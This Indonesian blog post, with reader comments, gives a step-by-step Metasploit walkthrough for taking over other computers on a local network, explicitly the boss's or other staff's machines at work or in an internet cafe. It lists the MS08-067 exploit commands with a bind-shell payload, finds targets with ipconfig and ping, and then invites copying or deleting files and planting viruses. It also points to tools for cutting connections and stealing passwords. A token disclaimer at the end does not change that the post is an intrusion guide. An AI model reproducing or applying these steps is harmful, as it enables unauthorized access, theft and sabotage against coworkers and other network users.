Ngintip komputer orang laen di jaringan lokal ? kenapa nggak

NGINTIP‘ berasal dari kata ‘NGIN‘ yang berarti ‘kepingin’ dan ‘TIP‘ yang merupakan kata yang diadopsi dari bahasa inggris yang dapat diartikan ‘uang persenan‘ ato familier didunia pariwisata saat seorang waiter ato waitress dikasiy uang tipping (uang persenan) oleh tamu yang berkunjung ke hotel ato restoran ato barangkali ke bar karena telah dilayani dengan pelayanan yang memuaskan..

jadi di sini kata ‘NGINTIP’ secara harfiah artinya ‘kepingin dikasiy uang persenan atau uang tip’….  nah sekarang siapa yang NGINTIP (kepingin dikasiy uang persenan)?… berikut jawaban dari beberapa responden:

Waiterwan said : ” every single pelayan juga kepengen dapetin uang tip, termasuk saiya” *sambil nginget tape recordernya yang     lagi  rusak tombol play-nya*

Waiterwati said : ” that’s absolutely right….”, *sambil nginget pernah dikasiy uang tip ma bule dari Holland saat pelayanan yang         dia  berikan sangat memuaskan ampe lembur jam 2 malem padahal pulang kerja biasanya jam 11 malem*

StaffKantR said : ” aku mah karena gak pernah dikasiy uang tip ma bos kantor, langsung tak install metasploit framework di komputer saya buat ngintip komputer bos”.

Nah… jawaban responden nomor 3 paling  ampuh meliat aplikasi yang dia install ternyata bener bener disebabkan karena NGINTIP. dan aplikasi metasploit memang digunakan untuk NGINTIP (di sini fungsinya bahkan lebih dari sekedar ngintip komputer yang terhubung dalam satu jaringan dengan komputer kita, karena dengan metasploit framework anda bener-bener mengendalikan komputer target, baca : komputer bos) misalnya ngintip komputer bos ato staff lainnya di kantor,, atau ngintip komputer admin ato client lainnya di warnet,,

sekarang bagaimana menggunakan aplikasi ini?

saat saya menulis posting ini, metasploit framework versi terbaru adalah versi 3.4. xxxx.

saya anggap di sini anda sudah menginstall aplikasi metasploit framework 3.4.xxxx.

jalankan metasploit console

kemudian di sini kita menggunakan exploit ‘windows/smb/ms08_067_netapi‘.  jadi di jendela console ketik ‘use windows/smb/ms08_067_netapi‘. (untuk meliat jenis exploit yang bisa digunakan, gunakan perintah ‘show exploits’.

setelah itu kita akan menggunakan payload ‘windows/shell/bind_tcp‘. jadi di jendela console ketik ‘set payload windows/shell/bind_tcp‘ . payload ini berfungsi untuk memasuki komputer target melalui jendela command prompt (jadi anda setidaknya sudah mengerti perintah-perintah dasar command prompt).

selanjutnya kita harus sudah mengetahui alamat ip komputer target, ip address komputer yang berada pada satu jaringan biasanya akan mirip-mirip dengan ip kita, nah sekarang coba cari tau alamat ip sendiri,, caranya… klik start run. kemudian masukkan ‘cmd‘ lalu tekan enter secara perlahan-lahan (jangan terlalu keras nanti keyboardnya rusak, mahal lo harga keyboard sekarang, 50 rb coba… mahal kan??? bayangkan bisa beli rokok class mild 7 bungkus itu..wakakakakakakk…)

nah sekarang akan muncul jendela command prompt. masukkan perintah ‘ipconfig‘. nah cari ip computer anda di sana.

liat gambar di bawah, coba perhatikan tulisan ” IP Address. . . . . . . . . . . . : 192.168.1.2” pada bagian “local area connection

192.168.1.2 adalah alamat ip computer saya setelah meberikan perintah ipconfig tadi. jadi jika saya berada di kantor anda mungkin alamat ip computer staff lain ato bos saya adalah : 192.168.1.3 atau   192.168. 1.4 atau   192.168.1.5 dan seterusnya dan seterusnya…

coba tes ping ke salah satu ip tersebut lewat command prompt dengan perintah ‘ping ip-komputer-target‘. jika ip tersebut memang sudah terdaftar pada jaringan anda maka perintah ping akan menghasilkan jawaban berupa

‘Reply from 192.168.1.3: bytes=32 time<1ms TTL=128’

nah sekarang kita kembali ke lap….. ah nggak,, bukan laptop.. kita kembali ke perintah metasploit framework..

saya tulis ulang di sini urutan perintahnya :

1. use windows/smb/ms08_067_netapi

2. set payload windows/shell/bind_tcp

nah sekarang kita sudah bisa menebak ip computer target.. tapi kalo gak mau main tebak-tebakan,, silahkan cari aplikasi untuk scan ip di jaringan semisal : netcut (bisa juga untuk mutusin koneksi internet target), p2pover (bisa untuk ngatur jatah bandwidth target, kalo dikasiy jatah bandwidth = 0 kbps maka sama artinya dengan mutusin koneksi dia), cain and abel ( bisa untuk nyuri password target dengan sangat gampang), dan lain sebagainya dan lain sebagainya…. for further information about ip scanning program.. please visit http://www.google.co.id.

jadi perintah ketiga di sini ketik     ‘set rhost 192.168.1.3‘.      rhost=komputer target. jadi perintah di samping saya misalkan mau masuk ke komputer dengan ip 192.168.1.3

3. set rhost ip-komputer-target

dan perintah terakhir adalah ‘exploit‘. setelah perintah terakhir ini maka program akan mencoba akses ke komputer dengan ip 192.168.1.3 , dan jika anda berhasil maka anda akan secara otomatis masuk ke command prompt dari komputer target tadi.

4. exploit

nah sekarang tinggal kita NGINTIP sepuasnya…, ato mo kopi file?, ataukah mo delete file?, ato juga mo masukin virus? ato malah mo iseng iseng aja mindahin data orang ke sana kemari, ato cuman sekedar ngintip doang? ,, ya gunakan kesempatan ini dengan bijak aja lah…

*NB : posting ini hanyak untuk sharing informasi tentan kemungkinan yang mungkin terjadi pada anda di kantor atau di warnet atau di tempat lain dimana anda dihadapkan pada keadaan untuk berada pada sebuah jaringan lokal, baik LAN maupun WLAN. kami berharap anda bisa menghindari hal buruk tersebut .. terimakasih……….

13 Responses to Ngintip komputer orang laen di jaringan lokal ? kenapa nggak

  1. eva asparini says:

    kangen ama orangnya…
    ha,hay….

  2. firman says:

    eh minta tutor mengenai linux yang banyak
    ok

  3. jaz says:

    hanya ada satu kata kunci untuk membuka banyak hal… gugel… .. yang lebih gampang lagi… youtube…

  4. firman says:

    sohib ama gambarnya dong biar kita lebih paham

  5. jaz says:

    ooo…. lain kali saat saya posting lagi deh fir ya… bener juga tuh.. sama gambar lebih bagus.. sama video jauh lebih bagus… sabar …

  6. Raja Molor says:

    Nah…..
    tutor gini yang ane hoby,,,

    posting yang banyak ya mas,,,,
    lbih bgos yang pkek linux.

  7. Hejaz says:

    hehe.. raja molor on facebook.. saya pake linux juga kok bang.. kebetulan tutorial ini kemaren tak tulis di komputer warnet dan masiy nongkrong di jendela.. thanks udah mampir..😀

  8. Raja Molor says:

    tukeran link blog yook……

  9. Raja Molor says:

    udah tw friend, tp kgk mo link, error……..

  10. Agus Setya says:

    mas tukeran link yuks..

  11. Agus Setya says:

    Links blog sobat sudah terpasang di usahasukses-ku.blogspot.com

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: